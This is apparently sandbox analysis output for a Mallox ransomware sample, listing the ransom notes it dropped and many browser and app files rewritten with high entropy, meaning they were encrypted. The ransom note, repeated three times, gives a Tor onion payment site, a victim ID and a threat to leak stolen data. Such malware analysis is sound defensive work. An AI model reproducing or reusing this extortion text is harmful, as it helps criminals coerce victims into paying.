      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt -> decryption toolfollow the instructions to decrypt all your datado not try to change or restore files yourself, this will break themif you want, on our site you can decrypt one file for free. free test decryption allowed only for not valuable file with size less than 3mbhow to get decryption tool:1) download and install tor browser by this link: https://www.torproject.org/download/2) if tor blocked in your country and you can't access to the link then use any vpn software3) run tor browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privatesignin4) copy your private id in the input field. your private key: 9012e04f2c4927607fa56a905) you will see payment information and we can make free test decryption here6)after payment, you will receive a tool for decrypting files, and we will delete the data that was taken from youour blog of leaked companies:wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onionif you are unable to contaJump to dropped file
      Writes many files with high entropy
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx entropy: 7.9999425913Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs entropy: 7.99994072397Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist entropy: 7.99790300633Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs entropy: 7.99994348459Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat entropy: 7.99906548408Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E8F64-1910.pma entropy: 7.99995672162Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_field_data.json entropy: 7.99923866824Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json entropy: 7.99965123319Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E9065-1B98.pma entropy: 7.99995287175Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log entropy: 7.99959580911Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E902E-1634.pma entropy: 7.99995368426Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set entropy: 7.99209616435Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1 entropy: 7.99935597684Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Favicons entropy: 7.990338024Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js entropy: 7.99791888758Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ExtensionActivityEdge entropy: 7.99468868724Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99442506545Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db entropy: 7.99203754513Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index entropy: 7.9993941967Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1 entropy: 7.99932530803Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal entropy: 7.99727564192Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor entropy: 7.99580584865Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens entropy: 7.99521118352Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL entropy: 7.99544337946Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies entropy: 7.9912828793Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data entropy: 7.99661263267Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm entropy: 7.99378951267Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons entropy: 7.9937029673Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History entropy: 7.99882120083Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index entropy: 7.99929221153Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\uu_host_config entropy: 7.99956211416Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index entropy: 7.99924716346Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens entropy: 7.99470788807Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL entropy: 7.995028169Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1 entropy: 7.99938459987Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index entropy: 7.99929807992Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1 entropy: 7.99930218832Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences entropy: 7.99375390003Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99376118014Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history entropy: 7.99083888814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99775770759Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js entropy: 7.99984762508Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js entropy: 7.9998494359Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js entropy: 7.99978833493Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data entropy: 7.99911405165Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99767931462Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links entropy: 7.99855557503Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens entropy: 7.99343680233Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites entropy: 7.99134091667Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js entropy: 7.99991888932Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js entropy: 7.99978018032Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js entropy: 7.99950768128Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js entropy: 7.99996492107Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js entropy: 7.99988305041Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js entropy: 7.99983878026Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json entropy: 7.99212196187Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json entropy: 7.9968333299Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json entropy: 7.99688835553Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json entropy: 7.99708763956Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json entropy: 7.99691637757Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json entropy: 7.99711073963Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json entropy: 7.99748508281Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json entropy: 7.99730509631Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json entropy: 7.99696850749Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl\strings.json entropy: 7.99675392814Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json entropy: 7.99746021509Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal entropy: 7.99985986401Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json entropy: 7.99654639154Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json entropy: 7.99633046595Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json entropy: 7.99649833262Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json entropy: 7.99799965204Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT\strings.json entropy: 7.99662173909Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR\strings.json entropy: 7.99714337266Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout\checkoutdata.json entropy: 7.99561467794Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\super_coupon.json entropy: 7.99060232219Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js entropy: 7.99960744928Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js entropy: 7.99961409317Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-tokenization-config.json entropy: 7.99333575751Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json entropy: 7.999926007Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json entropy: 7.99991027036Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites-pre-stable.json entropy: 7.99872259358Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout-eligible-sites.json entropy: 7.99967112013Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js entropy: 7.99966553105Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js entropy: 7.99340700006Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js entropy: 7.99946477727Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb entropy: 7.99840578371Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index entropy: 7.99931322398Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1 entropy: 7.99941095182Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index entropy: 7.9993395761Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js entropy: 7.99993148825Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1 entropy: 7.99931794453Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js entropy: 7.99987873592Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js entropy: 7.99988098005Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb entropy: 7.99531674187Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb entropy: 7.99649950404Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb entropy: 7.99886366816Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State entropy: 7.99574843287Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb entropy: 7.99947192949Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb entropy: 7.99490681172Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb entropy: 7.99055844966Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-es.hyb entropy: 7.99014807212Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb entropy: 7.99687414401Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb entropy: 7.9959948146Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb entropy: 7.99817774496Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb entropy: 7.99838218583Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb entropy: 7.99882373101Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Filtering Rules-AA entropy: 7.99954265225Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\Ruleset Data entropy: 7.99994647498Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50\LICENSE entropy: 7.99213148783Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2 entropy: 7.99377368752Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0 entropy: 7.99485856112Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index entropy: 7.99934921178Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1 entropy: 7.9992696119Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\safety_tips.pb entropy: 7.99848529279Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store entropy: 7.99990939725Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\crs.pb entropy: 7.9993405793Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history entropy: 7.99194002223Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json entropy: 7.99963353865Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0\typosquatting_list.pb entropy: 7.99884605306Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ZH entropy: 7.9997681404Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-RU entropy: 7.99984399197Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-NL entropy: 7.99640631538Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-IT entropy: 7.99962188682Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-FR entropy: 7.99976329397Jump to dropped file
      Source: C:\Users\user\Desktop\Ransomware Mallox.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ES entropy: 7.99867767456Jump to dropped file
